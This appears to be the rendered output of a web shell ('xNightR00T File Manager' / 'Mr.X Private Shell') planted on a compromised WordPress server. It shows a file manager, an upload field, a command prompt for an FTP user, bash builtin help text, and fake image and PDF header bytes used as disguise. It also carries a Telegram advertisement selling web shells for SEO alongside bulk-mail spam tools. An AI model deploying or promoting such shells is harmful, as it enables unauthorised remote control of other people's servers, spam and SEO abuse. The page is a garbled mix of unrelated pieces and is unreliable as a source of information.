xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
    Evaluate conditional expression.
    
    Exits with a status of 0 (true) or 1 (false) depending on
    the evaluation of EXPR.  Expressions may be unary or binary.  Unary
    expressions are often used to examine the status of a file.  There
    are string operators and numeric comparison operators as well.
    
    The behavior of test depends on the number of arguments.  Read the
    bash manual page for the complete specification.
    
    File operators:
    
      -a FILE        True if file exists.
      -b FILE        True if file is block special.
      -c FILE        True if file is character special.
      -d FILE        True if file is a directory.
      -e FILE        True if file exists.
      -f FILE        True if file exists and is a regular file.
      -g FILE        True if file is set-group-id.
      -h FILE        True if file is a symbolic link.
      -L FILE        True if file is a symbolic link.
      -k FILE        True if file has its `sticky' bit set.
      -p FILE        True if file is a named pipe.
      -r FILE        True if file is readable by you.
      -s FILE        True if file exists and is not empty.
      -S FILE        True if file is a socket.
      -t FD          True if FD is opened on a terminal.
      -u FILE        True if the file is set-user-id.
      -w FILE        True if the file is writable by you.
      -x FILE        True if the file is executable by you.
      -O FILE        True if the file is effectively owned by you.
      -G FILE        True if the file is effectively owned by your group.
      -N FILE        True if the file has been modified since it was last read.
    
      FILE1 -nt FILE2  True if file1 is newer than file2 (according to
                       modification date).
    
      FILE1 -ot FILE2  True if file1 is older than file2.
    
      FILE1 -ef FILE2  True if file1 is a hard link to file2.
    
    String operators:
    
      -z STRING      True if string is empty.
    
      -n STRING
         STRING      True if string is not empty.
    
      STRING1 = STRING2
                     True if the strings are equal.
      STRING1 != STRING2
                     True if the strings are not equal.
      STRING1 < STRING2
                     True if STRING1 sorts before STRING2 lexicographically.
      STRING1 > STRING2
                     True if STRING1 sorts after STRING2 lexicographically.
    
    Other operators:
    
      -o OPTION      True if the shell option OPTION is enabled.
      -v VAR	 True if the shell variable VAR is set
      -R VAR	 True if the shell variable VAR is set and is a name reference.
      ! EXPR         True if expr is false.
      EXPR1 -a EXPR2 True if both expr1 AND expr2 are true.
      EXPR1 -o EXPR2 True if either expr1 OR expr2 is true.
    
      arg1 OP arg2   Arithmetic tests.  OP is one of -eq, -ne,
                     -lt, -le, -gt, or -ge.
    
    Arithmetic binary operators return true if ARG1 is equal, not-equal,
    less-than, less-than-or-equal, greater-than, or greater-than-or-equal
    than ARG2.
    
    Exit Status:
    Returns success if EXPR evaluates to true; fails if EXPR evaluates to
    false or an invalid argument is given.

Filemanager

Name Type Size Permission Actions
alias File 540 B 0644
arith File 247 B 0644
arith_for File 331 B 0644
bg File 322 B 0644
bind File 1.79 KB 0644
break File 219 B 0644
builtin File 380 B 0644
caller File 459 B 0644
case File 247 B 0644
cd File 1.5 KB 0644
colon File 107 B 0644
command File 620 B 0644
compgen File 337 B 0644
complete File 966 B 0644
compopt File 1.02 KB 0644
conditional File 988 B 0644
continue File 264 B 0644
coproc File 358 B 0644
declare File 1.44 KB 0644
dirs File 973 B 0644
disown File 472 B 0644
dot File 433 B 0644
echo File 943 B 0644
enable File 889 B 0644
eval File 252 B 0644
exec File 661 B 0644
exit File 141 B 0644
export File 532 B 0644
false File 75 B 0644
fc File 946 B 0644
fg File 305 B 0644
fg_percent File 406 B 0644
for File 378 B 0644
function File 354 B 0644
getopts File 1.82 KB 0644
grouping_braces File 208 B 0644
hash File 789 B 0644
help File 601 B 0644
history File 1.27 KB 0644
if File 620 B 0644
jobs File 775 B 0644
kill File 720 B 0644
let File 1.49 KB 0644
local File 452 B 0644
logout File 129 B 0644
mapfile File 1.3 KB 0644
popd File 921 B 0644
printf File 1.22 KB 0644
pushd File 996 B 0644
pwd File 394 B 0644
read File 2.17 KB 0644
readarray File 85 B 0644
readonly File 652 B 0644
return File 337 B 0644
select File 835 B 0644
set File 4.02 KB 0644
shift File 232 B 0644
shopt File 580 B 0644
source File 433 B 0644
suspend File 340 B 0644
test File 3.15 KB 0644
test_bracket File 163 B 0644
time File 433 B 0644
times File 174 B 0644
trap File 1.46 KB 0644
true File 75 B 0644
type File 1.03 KB 0644
typeset File 80 B 0644
ulimit File 1.79 KB 0644
umask File 560 B 0644
unalias File 176 B 0644
unset File 641 B 0644
until File 264 B 0644
variable_help File 2.69 KB 0644
wait File 615 B 0644
while File 246 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml